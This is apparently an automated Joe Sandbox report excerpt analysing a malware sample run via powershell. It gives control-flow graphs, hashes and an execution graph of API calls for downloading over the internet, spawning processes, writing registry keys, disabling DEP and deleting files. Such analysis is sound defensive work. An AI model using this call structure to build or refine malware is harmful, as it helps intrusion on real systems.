                                                  • Not Executed
                                                  control_flow_graph 591 700db8-700ddb 592 700de1-700de6 591->592 593 700f32-700f4c 591->593 594 700de8-700dee 592->594 595 700dfe-700e02 592->595 608 700f5e-700f7e 593->608 609 700f4e-700f5d 593->609 599 700df0 594->599 600 700df2-700dfc 594->600 596 700e08-700e0a 595->596 597 700edf-700ee9 595->597 601 700e1a 596->601 602 700e0c-700e18 596->602 604 700ef7-700efd 597->604 605 700eeb-700ef4 597->605 599->595 600->595 607 700e1c-700e1e 601->607 602->607 610 700f03-700f0f 604->610 611 700eff-700f01 604->611 607->597 612 700e24-700e28 607->612 613 700f84-700f89 608->613 614 7010eb-70111d 608->614 609->608 615 700f11-700f2f 610->615 611->615 616 700e48 612->616 617 700e2a-700e46 612->617 618 700fa1-700fa5 613->618 619 700f8b-700f91 613->619 631 70112d 614->631 632 70111f-70112b 614->632 625 700e4a-700e4c 616->625 617->625 622 70109a-7010a4 618->622 623 700fab-700fad 618->623 626 700f93 619->626 627 700f95-700f9f 619->627 633 7010b2-7010b8 622->633 634 7010a6-7010af 622->634 628 700fbd 623->628 629 700faf-700fbb 623->629 625->597 635 700e52-700e65 625->635 626->618 627->618 638 700fbf-700fc1 628->638 629->638 639 70112f-701131 631->639 632->639 640 7010ba-7010bc 633->640 641 7010be-7010ca 633->641 655 700e6b-700e6d 635->655 638->622 644 700fc7-700fc9 638->644 646 701133-701139 639->646 647 70117d-701187 639->647 642 7010cc-7010e8 640->642 641->642 651 700fd9 644->651 652 700fcb-700fd7 644->652 648 701147-701164 646->648 649 70113b-70113d 646->649 653 701192-701198 647->653 654 701189-70118f 647->654 667 701166-701177 648->667 668 7011ca-7011cf 648->668 649->648 659 700fdb-700fdd 651->659 652->659 656 70119a-70119c 653->656 657 70119e-7011aa 653->657 660 700e85-700edc 655->660 661 700e6f-700e75 655->661 663 7011ac-7011c7 656->663 657->663 659->622 664 700fe3-700fe5 659->664 665 700e77 661->665 666 700e79-700e7b 661->666 672 700fe7-700fed 664->672 673 700fff-701003 664->673 665->660 666->660 667->647 668->667 677 700ff1-700ffd 672->677 678 700fef 672->678 674 701005-70100b 673->674 675 70101d-701097 673->675 679 70100d 674->679 680 70100f-70101b 674->680 677->673 678->673 679->675 680->675
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 011dc7eb47b02a2f4c4d5c094db364d3497a3d0a2b76391200fbc269c47985d0
                                                  • Instruction ID: e5a20049052b37fbb8cdf7f1c8b5dd74ebcce0962d7dd8078fa9eaffa89dc3b9
                                                  • Opcode Fuzzy Hash: 011dc7eb47b02a2f4c4d5c094db364d3497a3d0a2b76391200fbc269c47985d0
                                                  • Instruction Fuzzy Hash: 3911B131B00209CFCB64EE65C4407BAB7E5AF54370F2986A6D408E7295D779DC81CBE2
                                                  Function 0015D01D Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 700 15d01d-15d03d 701 15d08d-15d095 700->701 702 15d03f-15d04a 700->702 701->702 703 15d082-15d089 702->703 704 15d04c-15d05a 702->704 703->704 709 15d08b 703->709 706 15d060 704->706 708 15d063-15d06b 706->708 710 15d06d-15d075 708->710 711 15d07b-15d080 708->711 709->708 710->711 711->710
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397905010.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_15d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cb424f691c46fd0cad93bd52ebe572cc36fa656616848d56796bada6dd3f684c
                                                  • Instruction ID: d65527be609da7153d5001a0363096f4eab385eaae154c3095c38551a73e8675
                                                  • Opcode Fuzzy Hash: cb424f691c46fd0cad93bd52ebe572cc36fa656616848d56796bada6dd3f684c
                                                  • Instruction Fuzzy Hash: 1101DF31504340EAE7204A26E8C4B67FBA8DF41365F28841AFC584E2C2C379984ACBB2
                                                  Function 0015D006 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397905010.000000000015D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0015D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_15d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c909dc9b0dc8ddb4be0472542cbf977a4690041540710eabd54b93307a0d7ed8
                                                  • Instruction ID: e73e4403c00f38fa522718816024ad6700e160746f8946a1fde52e798f743b48
                                                  • Opcode Fuzzy Hash: c909dc9b0dc8ddb4be0472542cbf977a4690041540710eabd54b93307a0d7ed8
                                                  • Instruction Fuzzy Hash: 00015E6150D3C09FD7128B259C94B56BFB4DF53225F1980DBEC988F2E3C2699849CB72
                                                  Function 00701B7F Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6b51a01fa36b69ffb3c4639075b7cd5059dc1ede213a91cb9cbc5f795325c1b
                                                  • Instruction ID: 6ad5b8360bcc811cda5064ead538431ce0d8aaed68bf603dd4d4d7971bb818b7
                                                  • Opcode Fuzzy Hash: a6b51a01fa36b69ffb3c4639075b7cd5059dc1ede213a91cb9cbc5f795325c1b
                                                  • Instruction Fuzzy Hash: F1E0D872B04345CBEF15A66490613AD77916FA2324F9083E6C45097686DB788806C762

                                                  Non-executed Functions

                                                  Function 007000A0 Relevance: 15.4, Strings: 12, Instructions: 405COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (:1$(:1$(:1$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:1$L:1$L:1
                                                  • API String ID: 0-934840861
                                                  • Opcode ID: 3f8e38f70292ae2298013c14017f0f3b4be0da552cce856cf872f09ea8762796
                                                  • Instruction ID: f0c4e59683bfaab672fae36801ab28206dc3f917062052eaf8300622fca53bd8
                                                  • Opcode Fuzzy Hash: 3f8e38f70292ae2298013c14017f0f3b4be0da552cce856cf872f09ea8762796
                                                  • Instruction Fuzzy Hash: 34D10431B04344EFDB158F68C814BAE77E2AF85320F14816AE9159B2D2DB79DD41CBE2

                                                  Execution Graph

                                                  Execution Coverage:5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:4.5%
                                                  Total number of Nodes:1658
                                                  Total number of Limit Nodes:61
                                                  execution_graph 47275 415d41 47290 41b411 47275->47290 47277 415d4a 47301 4020f6 47277->47301 47281 415d65 47282 4170c4 47281->47282 47308 401fd8 47281->47308 47311 401e8d 47282->47311 47286 401fd8 11 API calls 47287 4170d9 47286->47287 47288 401fd8 11 API calls 47287->47288 47289 4170e5 47288->47289 47317 4020df 47290->47317 47295 41b456 InternetReadFile 47299 41b479 47295->47299 47297 41b4a6 InternetCloseHandle InternetCloseHandle 47298 41b4b8 47297->47298 47298->47277 47299->47295 47299->47297 47300 401fd8 11 API calls 47299->47300 47328 4020b7 47299->47328 47300->47299 47302 40210c 47301->47302 47303 4023ce 11 API calls 47302->47303 47304 402126 47303->47304 47305 402569 28 API calls 47304->47305 47306 402134 47305->47306 47307 404aa1 61 API calls ctype 47306->47307 47307->47281 47309 4023ce 11 API calls 47308->47309 47310 401fe1 47309->47310 47310->47282 47313 402163 47311->47313 47312 40219f 47312->47286 47313->47312 47368 402730 11 API calls 47313->47368 47315 402184 47369 402712 11 API calls std::_Deallocate 47315->47369 47318 4020e7 47317->47318 47334 4023ce 47318->47334 47320 4020f2 47321 43bda0 47320->47321 47326 4461b8 ___crtLCMapStringA 47321->47326 47322 4461f6 47340 44062d 20 API calls __dosmaperr 47322->47340 47324 4461e1 RtlAllocateHeap 47325 41b42f InternetOpenW InternetOpenUrlW 47324->47325 47324->47326 47325->47295 47326->47322 47326->47324 47339 443001 7 API calls 2 library calls 47326->47339 47329 4020bf 47328->47329 47330 4023ce 11 API calls 47329->47330 47331 4020ca 47330->47331 47341 40250a 47331->47341 47333 4020d9 47333->47299 47335 402428 47334->47335 47336 4023d8 47334->47336 47335->47320 47336->47335 47338 4027a7 11 API calls std::_Deallocate 47336->47338 47338->47335 47339->47326 47340->47325 47342 40251a 47341->47342 47343 402520 47342->47343 47344 402535 47342->47344 47348 402569 47343->47348 47358 4028e8 28 API calls 47344->47358 47347 402533 47347->47333 47359 402888 47348->47359 47350 40257d 47351 402592 47350->47351 47352 4025a7 47350->47352 47364 402a34 22 API calls 47351->47364 47366 4028e8 28 API calls 47352->47366 47355 40259b 47365 4029da 22 API calls 47355->47365 47357 4025a5 47357->47347 47358->47347 47360 402890 47359->47360 47361 402898 47360->47361 47367 402ca3 22 API calls 47360->47367 47361->47350 47364->47355 47365->47357 47366->47357 47368->47315 47369->47312 47370 426a77 47371 426a8c 47370->47371 47378 426b1e 47370->47378 47372 426bae 47371->47372 47375 426b0e 47371->47375 47376 426b83 47371->47376 47371->47378 47381 426b4e 47371->47381 47383 426ad9 47371->47383 47384 426bd5 47371->47384 47398 424f6e 49 API calls ctype 47371->47398 47372->47378 47372->47384 47386 425b72 47372->47386 47375->47378 47375->47381 47400 424f6e 49 API calls ctype 47375->47400 47376->47372 47402 425781 21 API calls 47376->47402 47381->47376 47381->47378 47401 41fbfd 52 API calls 47381->47401 47383->47375 47383->47378 47399 41fbfd 52 API calls 47383->47399 47384->47378 47403 4261e6 28 API calls 47384->47403 47388 425b91 ___scrt_get_show_window_mode 47386->47388 47387 425ba5 47393 425bc5 47387->47393 47394 425bae 47387->47394 47411 41daf0 49 API calls 47387->47411 47390 425ba0 47388->47390 47388->47393 47404 41ec4c 21 API calls 47388->47404 47390->47387 47390->47393 47405 420669 46 API calls 47390->47405 47393->47384 47394->47393 47412 424d96 21 API calls 2 library calls 47394->47412 47396 425c48 47396->47393 47406 432f55 47396->47406 47398->47383 47399->47383 47400->47381 47401->47381 47402->47372 47403->47378 47404->47390 47405->47396 47407 432f63 47406->47407 47408 432f5f 47406->47408 47409 43bda0 new 21 API calls 47407->47409 47408->47387 47410 432f68 47409->47410 47410->47387 47411->47394 47412->47393 47413 434906 47418 434bd8 SetUnhandledExceptionFilter 47413->47418 47415 43490b pre_c_initialization 47419 4455cc 20 API calls 2 library calls 47415->47419 47417 434916 47418->47415 47419->47417 47420 44839e 47428 448790 47420->47428 47423 4483b2 47425 4483ba 47426 4483c7 47425->47426 47436 4483ca 11 API calls 47425->47436 47437 44854a 47428->47437 47431 4487cf TlsAlloc 47432 4487c0 47431->47432 47444 43502b 47432->47444 47434 4483a8 47434->47423 47435 448319 20 API calls 3 library calls 47434->47435 47435->47425 47436->47423 47438 448576 47437->47438 47439 44857a 47437->47439 47438->47439 47443 44859a 47438->47443 47451 4485e6 47438->47451 47439->47431 47439->47432 47441 4485a6 GetProcAddress 47442 4485b6 __crt_fast_encode_pointer 47441->47442 47442->47439 47443->47439 47443->47441 47445 435036 IsProcessorFeaturePresent 47444->47445 47446 435034 47444->47446 47448 435078 47445->47448 47446->47434 47458 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47448->47458 47450 43515b 47450->47434 47452 448607 LoadLibraryExW 47451->47452 47453 4485fc 47451->47453 47454 448624 GetLastError 47452->47454 47455 44863c 47452->47455 47453->47438 47454->47455 47456 44862f LoadLibraryExW 47454->47456 47455->47453 47457 448653 FreeLibrary 47455->47457 47456->47455 47457->47453 47458->47450 47459 43bea8 47461 43beb4 _swprintf ___scrt_is_nonwritable_in_current_image 47459->47461 47460 43bec2 47475 44062d 20 API calls __dosmaperr 47460->47475 47461->47460 47464 43beec 47461->47464 47463 43bec7 ___scrt_is_nonwritable_in_current_image __cftoe 47470 445909 EnterCriticalSection 47464->47470 47466 43bef7 47471 43bf98 47466->47471 47470->47466 47473 43bfa6 47471->47473 47472 43bf02 47476 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 47472->47476 47473->47472 47477 4497ec 37 API calls 2 library calls 47473->47477 47475->47463 47476->47463 47477->47473 47478 434918 47479 434924 ___scrt_is_nonwritable_in_current_image 47478->47479 47505 434627 47479->47505 47481 43492b 47483 434954 47481->47483 47811 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 47481->47811 47491 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47483->47491 47516 4442d2 47483->47516 47486 434973 ___scrt_is_nonwritable_in_current_image 47488 4349f3 47524 434ba5 47488->47524 47491->47488 47812 443487 36 API calls 5 library calls 47491->47812 47498 434a15 47499 434a1f 47498->47499 47814 4434bf 28 API calls _Atexit 47498->47814 47500 434a28 47499->47500 47815 443462 28 API calls _Atexit 47499->47815 47816 43479e 13 API calls 2 library calls 47500->47816 47504 434a30 47504->47486 47506 434630 47505->47506 47817 434cb6 IsProcessorFeaturePresent 47506->47817 47508 43463c 47818 438fb1 47508->47818 47510 434641 47515 434645 47510->47515 47827 44415f 47510->47827 47513 43465c 47513->47481 47515->47481 47517 4442e9 47516->47517 47518 43502b CatchGuardHandler 5 API calls 47517->47518 47519 43496d 47518->47519 47519->47486 47520 444276 47519->47520 47521 4442a5 47520->47521 47522 43502b CatchGuardHandler 5 API calls 47521->47522 47523 4442ce 47522->47523 47523->47491 47877 436f10 47524->47877 47527 4349f9 47528 444223 47527->47528 47879 44f0d9 47528->47879 47530 44422c 47531 434a02 47530->47531 47883 446895 36 API calls 47530->47883 47533 40ea00 47531->47533 48054 41cbe1 LoadLibraryA GetProcAddress 47533->48054 47535 40ea1c GetModuleFileNameW 48059 40f3fe 47535->48059 47537 40ea38 47538 4020f6 28 API calls 47537->47538 47539 40ea47 47538->47539 47540 4020f6 28 API calls 47539->47540 47541 40ea56 47540->47541 48074 41beac 47541->48074 47545 40ea68 47546 401e8d 11 API calls 47545->47546 47547 40ea71 47546->47547 47548 40ea84 47547->47548 47549 40eace 47547->47549 48366 40fbee 118 API calls 47548->48366 48100 401e65 47549->48100 47552 40eade 47556 401e65 22 API calls 47552->47556 47553 40ea96 47554 401e65 22 API calls 47553->47554 47555 40eaa2 47554->47555 48367 410f72 36 API calls __EH_prolog 47555->48367 47557 40eafd 47556->47557 48105 40531e 47557->48105 47560 40eb0c 48110 406383 47560->48110 47561 40eab4 48368 40fb9f 78 API calls 47561->48368 47565 40eabd 48369 40f3eb 71 API calls 47565->48369 47569 401fd8 11 API calls 47570 40eb2d 47569->47570 47572 401fd8 11 API calls 47570->47572 47571 401fd8 11 API calls 47573 40ef36 47571->47573 47574 40eb36 47572->47574 47813 443396 GetModuleHandleW 47573->47813 47575 401e65 22 API calls 47574->47575 47576 40eb3f 47575->47576 48124 401fc0 47576->48124 47578 40eb4a 47579 401e65 22 API calls 47578->47579 47580 40eb63 47579->47580 47581 401e65 22 API calls 47580->47581 47582 40eb7e 47581->47582 47583 40ebe9 47582->47583 48370 406c59 47582->48370 47584 401e65 22 API calls 47583->47584 47590 40ebf6 47584->47590 47586 40ebab 47587 401fe2 28 API calls 47586->47587 47588 40ebb7 47587->47588 47589 401fd8 11 API calls 47588->47589 47592 40ebc0 47589->47592 47591 40ec3d 47590->47591 47595 413584 3 API calls 47590->47595 48128 40d0a4 47591->48128 48375 413584 RegOpenKeyExA 47592->48375 47594 40ec43 47596 40eac6 47594->47596 48131 41b354 47594->48131 47602 40ec21 47595->47602 47596->47571 47600 40ec5e 47603 40ecb1 47600->47603 48148 407751 47600->48148 47601 40f38a 48458 4139e4 30 API calls 47601->48458 47602->47591 48378 4139e4 30 API calls 47602->48378 47605 401e65 22 API calls 47603->47605 47608 40ecba 47605->47608 47617 40ecc6 47608->47617 47618 40eccb 47608->47618 47610 40f3a0 48459 4124b0 65 API calls ___scrt_get_show_window_mode 47610->48459 47611 40ec87 47615 401e65 22 API calls 47611->47615 47612 40ec7d 48379 407773 30 API calls 47612->48379 47626 40ec90 47615->47626 47616 40f3aa 47620 41bcef 28 API calls 47616->47620 48382 407790 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 47617->48382 47624 401e65 22 API calls 47618->47624 47619 40ec82 48380 40729b 98 API calls 47619->48380 47621 40f3ba 47620->47621 48258 413a5e RegOpenKeyExW 47621->48258 47625 40ecd4 47624->47625 48152 41bcef 47625->48152 47626->47603 47631 40ecac 47626->47631 47628 40ecdf 48156 401f13 47628->48156 48381 40729b 98 API calls 47631->48381 47635 401f09 11 API calls 47637 40f3d7 47635->47637 47639 401f09 11 API calls 47637->47639 47641 40f3e0 47639->47641 47640 401e65 22 API calls 47642 40ecfc 47640->47642 48261 40dd7d 47641->48261 47646 401e65 22 API calls 47642->47646 47648 40ed16 47646->47648 47647 40f3ea 47649 401e65 22 API calls 47648->47649 47650 40ed30 47649->47650 47651 401e65 22 API calls 47650->47651 47652 40ed49 47651->47652 47653 40edb6 47652->47653 47654 401e65 22 API calls 47652->47654 47655 40edc5 47653->47655 47661 40ef41 ___scrt_get_show_window_mode 47653->47661 47659 40ed5e _wcslen 47654->47659 47656 40edce 47655->47656 47682 40ee4a ___scrt_get_show_window_mode 47655->47682 47657 401e65 22 API calls 47656->47657 47658 40edd7 47657->47658 47660 401e65 22 API calls 47658->47660 47659->47653 47663 401e65 22 API calls 47659->47663 47662 40ede9 47660->47662 48443 413733 RegOpenKeyExA 47661->48443 47666 401e65 22 API calls 47662->47666 47664 40ed79 47663->47664 47667 401e65 22 API calls 47664->47667 47668 40edfb 47666->47668 47669 40ed8e 47667->47669 47671 401e65 22 API calls 47668->47671 48383 40da6f 47669->48383 47670 40ef8c 47672 401e65 22 API calls 47670->47672 47674 40ee24 47671->47674 47675 40efb1 47672->47675 47680 401e65 22 API calls 47674->47680 48178 402093 47675->48178 47677 401f13 28 API calls 47679 40edad 47677->47679 47683 401f09 11 API calls 47679->47683 47684 40ee35 47680->47684 47681 40efc3 48184 4137aa RegCreateKeyA 47681->48184 48168 413982 47682->48168 47683->47653 48441 40ce34 45 API calls _wcslen 47684->48441 47688 40ee45 47688->47682 47690 40eede ctype 47693 401e65 22 API calls 47690->47693 47691 401e65 22 API calls 47692 40efe5 47691->47692 48190 43bb2c 47692->48190 47694 40eef5 47693->47694 47694->47670 47697 40ef09 47694->47697 47700 401e65 22 API calls 47697->47700 47698 40effc 48446 41ce2c 87 API calls ___scrt_get_show_window_mode 47698->48446 47699 40f01f 47704 402093 28 API calls 47699->47704 47702 40ef12 47700->47702 47705 41bcef 28 API calls 47702->47705 47703 40f003 CreateThread 47703->47699 49359 41d4ee 10 API calls 47703->49359 47706 40f034 47704->47706 47707 40ef1e 47705->47707 47708 402093 28 API calls 47706->47708 48442 40f4af 104 API calls 47707->48442 47710 40f043 47708->47710 48194 41b580 47710->48194 47711 40ef23 47711->47670 47713 40ef2a 47711->47713 47713->47596 47715 401e65 22 API calls 47716 40f054 47715->47716 47717 401e65 22 API calls 47716->47717 47718 40f066 47717->47718 47719 401e65 22 API calls 47718->47719 47720 40f086 47719->47720 47721 43bb2c _strftime 40 API calls 47720->47721 47722 40f093 47721->47722 47723 401e65 22 API calls 47722->47723 47724 40f09e 47723->47724 47725 401e65 22 API calls 47724->47725 47726 40f0af 47725->47726 47727 401e65 22 API calls 47726->47727 47728 40f0c4 47727->47728 47729 401e65 22 API calls 47728->47729 47730 40f0d5 47729->47730 47731 40f0dc StrToIntA 47730->47731 48218 409e1f 47731->48218 47734 401e65 22 API calls 47735 40f0f7 47734->47735 47736 40f103 47735->47736 47737 40f13c 47735->47737 48447 43455e 47736->48447 47740 401e65 22 API calls 47737->47740 47742 40f14c 47740->47742 47741 401e65 22 API calls 47743 40f11f 47741->47743 47745 40f194 47742->47745 47746 40f158 47742->47746 47744 40f126 CreateThread 47743->47744 47744->47737 49357 41a045 103 API calls 2 library calls 47744->49357 47747 401e65 22 API calls 47745->47747 47748 43455e new 22 API calls 47746->47748 47749 40f19d 47747->47749 47750 40f161 47748->47750 47753 40f207 47749->47753 47754 40f1a9 47749->47754 47751 401e65 22 API calls 47750->47751 47752 40f173 47751->47752 47755 40f17a CreateThread 47752->47755 47756 401e65 22 API calls 47753->47756 47757 401e65 22 API calls 47754->47757 47755->47745 49362 41a045 103 API calls 2 library calls 47755->49362 47758 40f210 47756->47758 47759 40f1b9 47757->47759 47760 40f255 47758->47760 47761 40f21c 47758->47761 47762 401e65 22 API calls 47759->47762 48243 41b69e 47760->48243 47764 401e65 22 API calls 47761->47764 47765 40f1ce 47762->47765 47767 40f225 47764->47767 48454 40da23 31 API calls 47765->48454 47771 401e65 22 API calls 47767->47771 47768 401f13 28 API calls 47770 40f269 47768->47770 47773 401f09 11 API calls 47770->47773 47774 40f23a 47771->47774 47772 40f1e1 47775 401f13 28 API calls 47772->47775 47776 40f272 47773->47776 47785 43bb2c _strftime 40 API calls 47774->47785 47779 40f1ed 47775->47779 47777 40f27b SetProcessDEPPolicy 47776->47777 47778 40f27e CreateThread 47776->47778 47777->47778 47780 40f293 CreateThread 47778->47780 47781 40f29f 47778->47781 49330 40f7e2 47778->49330 47782 401f09 11 API calls 47779->47782 47780->47781 49358 412132 138 API calls 47780->49358 47783 40f2b4 47781->47783 47784 40f2a8 CreateThread 47781->47784 47786 40f1f6 CreateThread 47782->47786 47788 40f307 47783->47788 47790 402093 28 API calls 47783->47790 47784->47783 49360 412716 38 API calls ___scrt_get_show_window_mode 47784->49360 47787 40f247 47785->47787 47786->47753 49361 401be9 50 API calls _strftime 47786->49361 48455 40c19d 7 API calls 47787->48455 48255 41353a RegOpenKeyExA 47788->48255 47791 40f2d7 47790->47791 48456 4052fd 28 API calls 47791->48456 47796 40f328 47798 41bcef 28 API calls 47796->47798 47801 40f338 47798->47801 48457 413656 31 API calls 47801->48457 47805 40f34e 47806 401f09 11 API calls 47805->47806 47809 40f359 47806->47809 47807 40f381 DeleteFileW 47808 40f388 47807->47808 47807->47809 47808->47616 47809->47616 47809->47807 47810 40f36f Sleep 47809->47810 47810->47809 47811->47481 47812->47488 47813->47498 47814->47499 47815->47500 47816->47504 47817->47508 47819 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 47818->47819 47831 43a4ba 47819->47831 47822 438fc4 47822->47510 47824 438fcc 47825 438fd7 47824->47825 47845 43a4f6 DeleteCriticalSection 47824->47845 47825->47510 47873 44fbe8 47827->47873 47830 438fda 8 API calls 3 library calls 47830->47515 47833 43a4c3 47831->47833 47834 43a4ec 47833->47834 47835 438fc0 47833->47835 47846 438eff 47833->47846 47851 43a4f6 DeleteCriticalSection 47834->47851 47835->47822 47837 43a46c 47835->47837 47866 438e14 47837->47866 47839 43a481 47839->47824 47840 43a476 47840->47839 47871 438ec2 6 API calls try_get_function 47840->47871 47842 43a48f 47843 43a49c 47842->47843 47872 43a49f 6 API calls ___vcrt_FlsFree 47842->47872 47843->47824 47845->47822 47852 438cf3 47846->47852 47849 438f36 InitializeCriticalSectionAndSpinCount 47850 438f22 47849->47850 47850->47833 47851->47835 47853 438d27 47852->47853 47856 438d23 47852->47856 47853->47849 47853->47850 47854 438d47 47854->47853 47857 438d53 GetProcAddress 47854->47857 47856->47853 47856->47854 47859 438d93 47856->47859 47858 438d63 __crt_fast_encode_pointer 47857->47858 47858->47853 47860 438db0 47859->47860 47861 438dbb LoadLibraryExW 47859->47861 47860->47856 47862 438dd7 GetLastError 47861->47862 47865 438def 47861->47865 47864 438de2 LoadLibraryExW 47862->47864 47862->47865 47863 438e06 FreeLibrary 47863->47860 47864->47865 47865->47860 47865->47863 47867 438cf3 try_get_function 5 API calls 47866->47867 47868 438e2e 47867->47868 47869 438e46 TlsAlloc 47868->47869 47870 438e37 47868->47870 47870->47840 47871->47842 47872->47839 47876 44fc01 47873->47876 47874 43502b CatchGuardHandler 5 API calls 47875 43464e 47874->47875 47875->47513 47875->47830 47876->47874 47878 434bb8 GetStartupInfoW 47877->47878 47878->47527 47880 44f0eb 47879->47880 47881 44f0e2 47879->47881 47880->47530 47884 44efd8 47881->47884 47883->47530 47904 448295 GetLastError 47884->47904 47886 44efe5 47925 44f0f7 47886->47925 47888 44efed 47934 44ed6c 47888->47934 47891 44f004 47891->47880 47894 44f047 47959 446802 20 API calls _free 47894->47959 47898 44f042 47958 44062d 20 API calls __dosmaperr 47898->47958 47900 44f08b 47900->47894 47961 44ec42 20 API calls 47900->47961 47901 44f05f 47901->47900 47960 446802 20 API calls _free 47901->47960 47905 4482b7 47904->47905 47906 4482ab 47904->47906 47963 445b74 20 API calls 3 library calls 47905->47963 47962 44883c 11 API calls 2 library calls 47906->47962 47909 4482b1 47909->47905 47911 448300 SetLastError 47909->47911 47910 4482c3 47912 4482cb 47910->47912 47965 448892 11 API calls 2 library calls 47910->47965 47911->47886 47964 446802 20 API calls _free 47912->47964 47915 4482e0 47915->47912 47917 4482e7 47915->47917 47916 4482d1 47918 44830c SetLastError 47916->47918 47966 448107 20 API calls FindHandlerForForeignException 47917->47966 47968 446175 36 API calls 4 library calls 47918->47968 47921 4482f2 47967 446802 20 API calls _free 47921->47967 47923 448318 47924 4482f9 47924->47911 47924->47918 47926 44f103 ___scrt_is_nonwritable_in_current_image 47925->47926 47927 448295 FindHandlerForForeignException 36 API calls 47926->47927 47928 44f10d 47927->47928 47931 44f191 ___scrt_is_nonwritable_in_current_image 47928->47931 47969 446175 36 API calls 4 library calls 47928->47969 47970 445909 EnterCriticalSection 47928->47970 47971 446802 20 API calls _free 47928->47971 47972 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 47928->47972 47931->47888 47973 43a837 47934->47973 47937 44ed8d GetOEMCP 47939 44edb6 47937->47939 47938 44ed9f 47938->47939 47940 44eda4 GetACP 47938->47940 47939->47891 47941 4461b8 47939->47941 47940->47939 47942 4461f6 47941->47942 47946 4461c6 ___crtLCMapStringA 47941->47946 47984 44062d 20 API calls __dosmaperr 47942->47984 47944 4461e1 RtlAllocateHeap 47945 4461f4 47944->47945 47944->47946 47945->47894 47948 44f199 47945->47948 47946->47942 47946->47944 47983 443001 7 API calls 2 library calls 47946->47983 47949 44ed6c 38 API calls 47948->47949 47950 44f1b8 47949->47950 47953 44f209 IsValidCodePage 47950->47953 47955 44f1bf 47950->47955 47957 44f22e ___scrt_get_show_window_mode 47950->47957 47951 43502b CatchGuardHandler 5 API calls 47952 44f03a 47951->47952 47952->47898 47952->47901 47954 44f21b GetCPInfo 47953->47954 47953->47955 47954->47955 47954->47957 47955->47951 47985 44ee44 GetCPInfo 47957->47985 47958->47894 47959->47891 47960->47900 47961->47894 47962->47909 47963->47910 47964->47916 47965->47915 47966->47921 47967->47924 47968->47923 47969->47928 47970->47928 47971->47928 47972->47928 47974 43a854 47973->47974 47980 43a84a 47973->47980 47975 448295 FindHandlerForForeignException 36 API calls 47974->47975 47974->47980 47976 43a875 47975->47976 47981 4483e4 36 API calls __Getctype 47976->47981 47978 43a88e 47982 448411 36 API calls __cftoe 47978->47982 47980->47937 47980->47938 47981->47978 47982->47980 47983->47946 47984->47945 47990 44ee7e 47985->47990 47994 44ef28 47985->47994 47987 43502b CatchGuardHandler 5 API calls 47989 44efd4 47987->47989 47989->47955 47995 4511ac 47990->47995 47993 44aee6 _swprintf 41 API calls 47993->47994 47994->47987 47996 43a837 __cftoe 36 API calls 47995->47996 47997 4511cc MultiByteToWideChar 47996->47997 47999 45120a 47997->47999 48006 4512a2 47997->48006 48001 4461b8 ___crtLCMapStringA 21 API calls 47999->48001 48005 45122b __alloca_probe_16 ___scrt_get_show_window_mode 47999->48005 48000 43502b CatchGuardHandler 5 API calls 48002 44eedf 48000->48002 48001->48005 48009 44aee6 48002->48009 48003 45129c 48014 435ecd 20 API calls _free 48003->48014 48005->48003 48007 451270 MultiByteToWideChar 48005->48007 48006->48000 48007->48003 48008 45128c GetStringTypeW 48007->48008 48008->48003 48010 43a837 __cftoe 36 API calls 48009->48010 48011 44aef9 48010->48011 48015 44acc9 48011->48015 48014->48006 48016 44ace4 ___crtLCMapStringA 48015->48016 48017 44ad0a MultiByteToWideChar 48016->48017 48018 44ad34 48017->48018 48029 44aebe 48017->48029 48021 4461b8 ___crtLCMapStringA 21 API calls 48018->48021 48026 44ad55 __alloca_probe_16 48018->48026 48019 43502b CatchGuardHandler 5 API calls 48020 44aed1 48019->48020 48020->47993 48021->48026 48022 44ae0a 48051 435ecd 20 API calls _free 48022->48051 48023 44ad9e MultiByteToWideChar 48023->48022 48024 44adb7 48023->48024 48042 448c33 48024->48042 48026->48022 48026->48023 48029->48019 48030 44ade1 48030->48022 48032 448c33 _strftime 11 API calls 48030->48032 48031 44ae19 48034 4461b8 ___crtLCMapStringA 21 API calls 48031->48034 48035 44ae3a 